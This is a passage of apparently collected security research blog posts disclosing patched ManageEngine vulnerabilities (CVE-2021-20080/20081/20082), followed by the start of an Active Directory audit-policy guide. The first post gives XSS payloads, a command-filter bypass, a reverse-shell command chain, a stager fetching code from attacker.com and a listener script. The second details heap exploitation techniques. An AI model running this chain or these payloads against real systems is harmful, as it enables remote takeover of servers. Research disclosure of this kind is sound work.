It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
    jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close

sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. Suppose we specified “AN IP” (note the space) as the IP address in the inet line:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
    jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above, I have pasted a screenshot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
    String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
    return restrictedWords.split(",");
}

public Set containsScriptRestrictedWords(String input) throws Exception {
    HashSet<String> input_words = new HashSet<String>();
    input_words.addAll(Arrays.asList(input.split(" ")));
    input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
    return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"
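
To see why the comma trick slips past the filter, here is a short Python re-implementation of the restricted-word check quoted from ServiceDeskUtil.java (split on spaces, intersect with the word list). It is a model of the Java logic above, not the product’s own code, and the sample commands are illustrative.

RESTRICTED_WORDS = {"outfile", "Out-File", "write", "echo", "OpenTextFile", "move",
                    "Move-Item", "mv", "MoveFile", "del", "Remove-Item", "remove",
                    "rm", "unlink", "rmdir", "DeleteFile", "ren", "Rename-Item",
                    "rename", "cp"}

def contains_restricted_words(command):
    # Mirror of containsScriptRestrictedWords(): split on spaces, keep only restricted words
    return set(command.split(" ")) & RESTRICTED_WORDS

blocked = "cmd /c echo testing > C:\\test.txt"        # 'echo' appears as its own token
bypass  = 'cmd /c "echo,testing > C:\\test.txt"'      # the comma keeps 'echo' glued to 'testing'

print(contains_restricted_words(blocked))   # {'echo'} -> rejected by the filter
print(contains_restricted_words(bypass))    # set()    -> accepted, nothing matches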

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention: a maximum length was enforced on the injected payload. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
    eval(this.responseText);
}
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET", "http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *
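
A minimal attacker-side listener that serves the second-stage JavaScript with this header could look like the following sketch, using Python’s standard http.server. The filename stage2.js and the port are placeholders, not values from the original exploit.

from http.server import BaseHTTPRequestHandler, HTTPServer

class Stage2Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the second-stage JavaScript to the victim's browser
        with open("stage2.js", "rb") as f:
            body = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "application/javascript")
        # Required so the XSS running in the SDP origin may read this cross-origin response
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), Stage2Handler).serve_forever()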

This header tells the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since the two are cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.



Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

This blog will go over the exploitation of an integer overflow (CVE-2021–20082) that I found in the agent component itself, the Asset Explorer Agent. This exploit could allow an attacker to pivot through the network once the ManageEngine server is compromised. Alternatively, it could be exploited by spoofing the ManageEngine server IP on the network and triggering the vulnerability, as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase the odds of exploitation.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command, however, it expects to receive an authtoken, which it echoes back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem: since that configured IP address is not ours, the agent asks the real ManageEngine server to approve the authtoken we sent, which is always going to be denied.

There is a way an attacker can exploit this design, however, and that’s by spoofing their IP on the network to be the ManageEngine server. As I mentioned, certificates are not validated, which allows an attacker to send and receive these requests without an issue. This gives the attacker full control over the authtoken approval step, resulting in the agent running any arbitrary agent command.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited set of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agent, I found a couple of small memory handling issues, such as leaks and a heap overflow with Unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the ManageEngine server. Since we are assuming the attacker has been able to insert themselves as a fake ManageEngine server, or has compromised a real one, they can craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of these is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means that if we supply a Content-Size field of UINT32_MAX/4, we should be able to overflow the integer so that it wraps back around to a size of 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API, InternetReadFile, will copy our POST payload data into the destination buffer until all of the POST data contents are read. If our POST data is larger than two bytes, that data will be copied beyond the two-byte buffer, resulting in a heap overflow.
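
The wraparound is easy to reproduce with the arithmetic described above ((size + 1) * 4 + 2, truncated to 32 bits). A quick Python illustration:

UINT32_MAX = 0xFFFFFFFF

def alloc_size(content_size):
    # Mirror the described size computation on a 32-bit unsigned integer
    return ((content_size + 1) * 4 + 2) & UINT32_MAX

content_size = UINT32_MAX // 4          # 0x3FFFFFFF, supplied in the Content-Size field
print(hex(alloc_size(content_size)))    # 0x2 -> calloc allocates only two bytes
print(hex(alloc_size(1024)))            # 0x1006 -> normal, non-wrapping case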

Things are looking really good here because not only can we control the size of the heap overflow (tailoring our POST data size to overwrite whatever amount of heap memory we like), but we can also write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a doubly linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means that if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the _CrtMemBlockHeader* next pointer will be written to wherever *prev points. It gets better: we can also overflow into the _CrtMemBlockHeader* next pointer, allowing us to control what *next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev pointers are both dereferenced and written to in this remerging logic, which means I can’t just overwrite the *prev pointer with any arbitrary data I want; it must itself be a valid pointer to a writable memory location, since its contents will also be written to during the Free_dbg function. In other words, I can only write pointers, and those pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as those point to RX-protected memory) as well as pointers to non-existent memory (as the dereference step in Free_dbg would cause an access violation). This proved to be very constraining for my exploitation.
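
To make the primitive and its constraint concrete, here is a small Python model of the unlink-style remerge on free. The field layout is invented for illustration; the point is only that both overwritten pointers get dereferenced and written through, so both must refer to writable memory.

# Toy model of the Free_dbg remerge: unlinking a node writes through both neighbor pointers.
class FakeHeader:
    def __init__(self, name):
        self.name = name
        self.next = None   # stands in for _CrtMemBlockHeader* next
        self.prev = None   # stands in for _CrtMemBlockHeader* prev

def free_dbg(node):
    # prev->next = next : writes node.next through whatever node.prev points at
    node.prev.next = node.next
    # next->prev = prev : writes node.prev through whatever node.next points at
    node.next.prev = node.prev

victim = FakeHeader("overflowed heap cell")
fake_dst = FakeHeader(".data global we want to overwrite")   # must be writable
fake_val = FakeHeader("heap cell holding our SMB string")    # must also be writable

# The attacker's heap overflow replaces the victim's link pointers:
victim.prev = fake_dst
victim.next = fake_val

free_dbg(victim)
print(fake_dst.next.name)   # "heap cell holding our SMB string": our chosen pointer was written
print(fake_val.prev.name)   # the reverse write also happened, hence both targets must be writable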

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate for leveraging this pointer write primitive: a global variable pointer in Asset Explorer’s .data section that points to a Unicode string dictating the current working directory of the ManageEngine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory of the remote Asset Explorer service, which is exactly what I need for this exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file with the same name on our share, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and let it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this would ideally require some grooming, so we could trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately, my heap grooming attempts were not able to force allocations where I wanted them. This is due partly to the limited sizes I was able to allocate remotely in the target process, and in large part to my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts, since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found that ~20 attempts of this overflow will usually end up overflowing the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of the following form to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev pointer with the .data address of the current-working-directory global variable, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* next pointer, then we won’t need an info leak. Since the upper three bytes already dictate the SMB string’s general memory address, we just need to offset the last byte so that the pointer lands in the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I chose to overwrite the lowest order byte with “0xf8”, to guarantee the maximum offset from the _CrtMemBlockHeader.
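
The partial overwrite itself is just byte-level surgery on a little-endian pointer: only the lowest byte changes, so the upper three bytes (and therefore the general region of the SMB string) are preserved without ever leaking an address. A small Python illustration, with a made-up example address:

import struct

original_ptr = 0x00A451B0                           # hypothetical address of the SMB string's heap header
raw = bytearray(struct.pack("<I", original_ptr))    # the pointer as it sits in memory (little-endian)

raw[0] = 0xF8                                       # the overflow clobbers only the lowest-order byte
patched_ptr = struct.unpack("<I", raw)[0]

print(hex(original_ptr))   # 0xa451b0
print(hex(patched_ptr))    # 0xa451f8 -> same upper three bytes, now offset 0xf8 into the region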

It’s beneficial if we can craft an SMB path string with prepended nonsense characters (similar to a NOP sled, but for a file path). This gives us a greater probability that our 0xf8 offset points somewhere in the SMB path string that SetCurrentDirectory will still interpret as a valid path with prepended junk (i.e.: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for an SMB share; thankfully, Chris Lyne was able to craft a nicely padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This allows the path to be treated simply as “//<ip_address>/a/”. If we provide enough “//.” sequences in front of our path, we will have about a ⅓ chance of hitting our sled properly when overwriting the lowest pointer byte with 0xf8. Much better odds than if I had used a simple, straightforward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I searched for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic library load (not super common for applications to do) that I can trigger, and it cannot be a known DLL (ie: kernel32.dll, rpcrt4.dll, etc.), since the search order for known DLLs will not bother with the application’s current working directory, but rather prioritizes loading from the Windows directories. For this I needed to find a way to trigger the agent to load an unknown DLL.

After searching, I found a function called GetPdbDll in the agent which attempts to dynamically load “Mspdb80.dll”, a debugging DLL used for RTC (run-time checks). This is an unknown DLL, so the agent should attempt to load it from its current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs or code flow that could end up calling this function; I assume it was left in as a stub by the compiler, as I couldn’t even find indirect calls that might lead code flow there. I would have to abandon my data-only attack plan and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory, nor can I overwrite a function pointer with it. There was one place, however, where I saw a pointer TO a function pointer being called, which is something I can actually abuse. It’s in the _CrtDbgReport function, which allows the Microsoft runtime to alert in the event of various integrity violations, one of which is a failure of a heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However, this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but we can leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in the .data section too!). This is also great because it doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook is a pointer TO a function pointer (a big, beneficial difference for us). We just need to register our own _pfnReportHook that points to a function pointer for the function that loads “Mspdb80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute “Mspdb80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier, where subsequent heap cell allocations bypass the need for an infoleak. That unique scenario only applied to the Unicode strings in this application, and we can’t represent our function pointers with Unicode. For this step I chose to overwrite the _pfnReportHook variable with a pointer to a random offset within my heap (again, no infoleak required: a similar technique to partially overwriting the _CrtMemBlockHeader* next pointer, but this time overwriting its lower two bytes in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdbDll function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC GitHub: https://github.com/tenable/poc. ManageEngine has since patched this issue. For more details, you can check out our research advisory at https://www.tenable.com/security/research.



Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

